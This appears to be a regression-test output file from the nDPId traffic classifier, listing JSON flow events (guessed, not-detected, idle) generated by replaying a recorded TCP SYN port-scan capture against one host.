-00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 